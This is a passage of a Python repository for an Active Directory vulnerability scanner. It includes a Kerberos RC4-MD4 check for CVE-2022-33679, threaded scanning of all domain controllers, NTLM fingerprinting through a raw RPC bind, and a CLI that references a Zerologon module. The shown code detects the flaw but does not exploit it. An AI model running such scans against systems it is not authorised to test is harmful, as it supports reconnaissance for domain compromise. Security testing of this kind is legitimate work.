 57 |     reqBody['rtime'] = KerberosTime.to_asn1(now)
 58 |     reqBody['nonce'] = rand.getrandbits(31)
 59 | 
 60 |     # 设置默认的加密方式为RC4-MD4(-128)
 61 |     supportedCiphers = (-128,)
 62 |     seq_set_iter(reqBody, 'etype', supportedCiphers)
 63 | 
 64 |     message = encoder.encode(asReq)
 65 | 
 66 |     try:
 67 |         r = sendReceive(message, domain, kdcHost)
 68 |         # 正常的错误应该是error-code: eRR-PREAUTH-REQUIRED (25)
 69 |         # 这种情况下不会抛出异常，说明目标接受 RC4-MD4
 70 |         return True
 71 |     except KerberosError as e:
 72 |         if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
 73 |             return False
 74 |         else:
 75 |             raise
 76 | 
 77 | 
 78 | class CVE202233679(Runner):
 79 |     def __init__(self, target: Target, opts):
 80 |         """
 81 |             33679漏洞检测
 82 |             必要条件：
 83 |                 1. 一个域内存在的用户（非禁用状态）
 84 |                 2. 域名
 85 |                 3. 域控ip
 86 |             python依赖：
 87 |                 1. impacket
 88 |                 2. certipy
 89 |             """
 90 |         super().__init__(target=target,
 91 |                          required_params=['username', 'domain', 'dc_ip'])
 92 |         self._target = target
 93 |         self._opts = opts
 94 | 
 95 |     def run(self, target_ip=None):
 96 |         if target_ip is not None:
 97 |             target_ip = target_ip
 98 |         else:
 99 |             target_ip = self._target.dc_ip
100 |         try:
101 |             if has_33679(self._target.username, self._target.domain, target_ip):
102 |                 logging.info(f'[{target_ip}] has 33679')
103 |             else:
104 |                 logging.info(f'[{target_ip}] is not vuln')
105 |         except Exception as e:
106 |             logging.error(f'[{target_ip}] {e}')
107 | 
108 | 
109 | if __name__ == '__main__':
110 |     logging.getLogger().setLevel(logging.INFO)
111 | 
112 |     domain = 'jd.local'
113 |     username = 'DC01'
114 |     dc_ip = '192.168.31.111'
115 | 
116 |     t = Target.create(domain=domain, username=username, dc_ip=dc_ip, no_pass=True)
117 |     runner = CVE202233679(t, opts=None)
118 |     # 单机扫描
119 |     runner.run()
120 |     # 批量扫描（自动）
121 |     runner.run_multi()
122 |     # 批量扫描（手动）
123 |     runner.run_multi("""192.168.31.110
124 |     192.168.31.111""".split('\n'))
125 | 


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | from .runner import Runner
2 | 
3 | __all__ = [Runner]


--------------------------------------------------------------------------------
/lib/runner.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | import sys
 3 | from concurrent.futures import ThreadPoolExecutor, wait
 4 | from impacket.ntlm import NTLMSSP_AV_DNS_DOMAINNAME
 5 | 
 6 | from certipy.lib.target import Target
 7 | from .utils import get_all_dcs, target_validator, ntlm_info
 8 | 
 9 | logger = logging.getLogger('base')
10 | 
11 | 
12 | class Runner:
13 |     def __init__(self, target: Target, required_params=None):
14 |         # 初始化之前进行必要参数检查
15 |         if required_params is None:
16 |             required_params = []
17 |         if not target_validator(target, required_params):
18 |             sys.exit(1)
19 |         self._target = target
20 |         if not self._target.domain:
21 |             self._target.domain = ntlm_info(self._target.dc_ip)[NTLMSSP_AV_DNS_DOMAINNAME]
22 | 
23 |     def run(self, target_ip=None):
24 |         """
25 |         虚函数，实现检测逻辑
26 |         """
27 |         logging.error('not implemented')
28 |         raise NotImplementedError()
29 | 
30 |     def _run(self, target_ip=None):
31 |         try:
32 |             self.run(target_ip)
33 |         except BaseException as ex:
34 |             logging.error(f'[{self.__class__.__name__}] {ex}')
35 | 
36 |     def run_multi(self, target_set=None, max_workers=10):
37 |         """
38 |         如果没有指定域控进行攻击那么就利用dns查询所有域控ip，对这些域控进行攻击
39 |         如果指定了域控列表，就对列表内的域控进行攻击
40 |         """
41 |         if target_set is None:
42 |             target_set = get_all_dcs(self._target)
43 |         elif isinstance(target_set, str):
44 |             try:
45 |                 with open(target_set) as f:
46 |                     target_set = f.readlines()
47 |             except Exception as e:
48 |                 logger.error(f'error open file {e}')
49 |                 sys.exit(1)
50 |         else:
51 |             target_set = target_set
52 | 
53 |         with ThreadPoolExecutor(max_workers=max_workers) as pool:
54 |             logger.debug(f'{len(target_set)} targets to run with max worker {max_workers}')
55 |             fs = [pool.submit(self._run, target.strip()) for target in target_set]
56 |             wait(fs)
57 | 
58 |     def exploit(self):
59 |         """
60 |         TODO
61 |         漏洞利用逻辑实现
62 |         """
63 |         pass
64 | 


--------------------------------------------------------------------------------
/lib/utils.py:
--------------------------------------------------------------------------------
  1 | import base64
  2 | import logging
  3 | from concurrent.futures import ThreadPoolExecutor, wait
  4 | 
  5 | from impacket import ntlm
  6 | from impacket.dcerpc.v5 import transport
  7 | 
  8 | from certipy.lib.target import Target
  9 | from impacket.dcerpc.v5.rpcrt import MSRPCHeader
 10 | 
 11 | logger = logging.getLogger('utils')
 12 | 
 13 | 
 14 | def get_all_dcs(target: Target):
 15 |     target_domain = target.domain
 16 |     super_resolver = target.resolver.resolver
 17 | 
 18 |     if not all([target_domain, super_resolver.nameservers]):
 19 |         logger.error('you must specify domain name and a nameserver')
 20 |         return []
 21 |     try:
 22 |         aws = target.resolver.resolver.resolve(target.domain)
 23 |         logger.debug(f'got dc ips: {list(aws)}')
 24 |         return [str(aw) for aw in list(aws)]
 25 |     except Exception as e:
 26 |         logger.error(f'some error happened resolving domain name: {e}')
 27 |         return []
 28 | 
 29 | 
 30 | def target_validator(target: Target, must_specify_attrs: list):
 31 |     """
 32 |     @target_validator 用于验证参数是否满足必要条件，must_specify_attrs为一个嵌套数组，该数组内允许str、
 33 |     tuple两种数据类型，原数组内所有属性满足条件为且，若存在嵌套数组，则满足条件为或，如：
 34 |     ['domain', 'username'] 含义为target需要存在domain AND username
 35 |     ['domain', 'username', ('password', 'hashes')] 表示
 36 |     target中需要存在 domain AND username AND (password OR hashes)
 37 |     """
 38 |     for must_specify_attr in must_specify_attrs:
 39 |         try:
 40 |             if isinstance(must_specify_attr, str):
 41 |                 attr = getattr(target, must_specify_attr)
 42 |                 if not attr:
 43 |                     logger.error(f'parameter {must_specify_attr} not specified.')
 44 |                     return False
 45 |             if isinstance(must_specify_attr, tuple):
 46 |                 if not any([getattr(target, must_attr) for must_attr in must_specify_attr]):
 47 |                     logger.error(f'one of the following parameters must specified [{", ".join(must_specify_attr)}] .')
 48 |         except AttributeError as e:
 49 |             logger.error(f'get attribute error: {e}')
 50 |             return False
 51 | 
 52 |     return True
 53 | 
 54 | 
 55 | def multi_run(fn, targets, max_worker=10):
 56 |     with ThreadPoolExecutor(max_workers=max_worker) as pool:
 57 |         logger.info(f'{len(targets)} to run with max worker {max_worker}')
 58 |         fs = [pool.submit(fn, target) for target in targets]
 59 |         wait(fs)
 60 | 
 61 | 
 62 | def ntlm_info(target_ip, method='rpc'):
 63 |     available_method = {'smb': f'ncacn_np:{target_ip}[\\PIPE\\netlogon]',
 64 |                         'rpc': f'ncacn_ip_tcp:{target_ip}[135]',
 65 |                         'ldap': f''}
 66 |     target_info = {ntlm.NTLMSSP_AV_DNS_HOSTNAME: '',
 67 |                    ntlm.NTLMSSP_AV_DNS_DOMAINNAME: '',
 68 |                    ntlm.NTLMSSP_AV_DNS_TREENAME: '',
 69 |                    ntlm.NTLMSSP_AV_HOSTNAME: ''}
 70 | 
 71 |     bind_data = base64.b64decode('BQALAxAAAABwACAAAQAAALgQuBAAAAAAAQAAAAAAAQAIg6/hH13JEZGkCAArFKD6AwAAAARdiIrr'
 72 |                                  'HMkRn+gIACsQSGACAAAACgIAAAAAAABOVExNU1NQAAEAAAAFAoigAAAAAAAAAAAAAAAAAAAAAA==')
 73 |     if method not in available_method:
 74 |         logger.error(f'available methods: {available_method}')
 75 |     if method != 'ldap':
 76 |         c = transport.DCERPCTransportFactory(available_method.get(method))
 77 |         c.connect()
 78 |         c.send(bind_data)
 79 |         s = c.recv()
 80 |         if s:
 81 |             logger.debug(s)
 82 |             resp = MSRPCHeader(s)
 83 |             auth_data = resp['auth_data']
 84 |             challenge_msg = ntlm.NTLMAuthChallenge(auth_data)
 85 |             av_pairs = ntlm.AV_PAIRS(challenge_msg['TargetInfoFields'])
 86 |             for k in target_info:
 87 |                 _, av_data = av_pairs[k]
 88 |                 target_info[k] = av_data.decode('utf-16')
 89 |             logger.debug(target_info)
 90 |         else:
 91 |             logger.error(f'no data received')
 92 | 
 93 |     else:
 94 |         pass
 95 | 
 96 |     return target_info
 97 | 
 98 | 
 99 | if __name__ == '__main__':
100 |     t = Target.create(dc_ip='192.168.31.110',
101 |                       domain='jd.local',
102 |                       password='1234')
103 | 
104 |     # target_validator(t, ['dc_ip', 'domain', ('hashes', 'password')])
105 |     ntlm_info('192.168.31.110', 'smb')
106 |     # dcpis = get_all_dcs(t)
107 |     # print(dcpis)
108 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import logging
 3 | import sys
 4 | 
 5 | from certipy.lib.target import Target
 6 | from certipy.commands.parsers import target
 7 | from impacket.examples import logger
 8 | 
 9 | from exploits import ALL_EXPLOITS
10 | 
11 | from exploits import cve_2020_1472 as zerologon
12 | 
13 | if __name__ == '__main__':
14 |     parser = argparse.ArgumentParser(
15 |         add_help=False,
16 |         description="Active Directory Vulnerability Scanner",
17 |     )
18 | 
19 |     parser.add_argument('module', choices=ALL_EXPLOITS.keys(), help='modules')
20 |     parser.add_argument("-h", "--help", action="help", default=argparse.SUPPRESS,
21 |                         help="Show this help message and exit")
22 |     parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')
23 |     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
24 | 
25 |     target.add_argument_group(parser)
26 | 
27 |     group = parser.add_argument_group("multi targets options")
28 |     group.add_argument('-all-dc', action='store_true', help='attack all dcs')
29 |     group.add_argument('-tf', metavar='target file', action='store', help='path to targets file')
30 |     group.add_argument('--threads', metavar='threads', default=10, help='number of worker threads', type=int)
31 | 
32 |     group = parser.add_argument_group("ntlm info options")
33 |     group.add_argument('-ntlm-method', choices=['rpc', 'smb'], help='method for ntlm info detection')
34 | 
35 |     group = parser.add_argument_group("ldap connection options")
36 |     group.add_argument('-ldap-scheme', choices=['ldap', 'ldaps'], default='ldaps',
37 |                        help='method for ntlm info detection')
38 | 
39 |     zerologon.add_add_argument_group(parser)
40 | 
41 |     if len(sys.argv) < 2:
42 |         parser.print_help()
43 |         sys.exit(1)
44 | 
45 |     options = parser.parse_args()
46 |     logger.init(options.ts)
47 |     if options.debug is True:
48 |         logging.getLogger().setLevel(logging.DEBUG)
49 |     else:
50 |         logging.getLogger().setLevel(logging.INFO)
51 |     options.no_pass = True
52 |     t = Target.from_options(options)
53 | 
54 |     act = ALL_EXPLOITS.get(options.module)
55 |     runner = act(t, options)
56 |     if any([options.tf, options.all_dc]):
57 |         runner.run_multi(options.tf, options.threads)
58 |     else:
59 |         runner.run()
60 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | certipy-ad


--------------------------------------------------------------------------------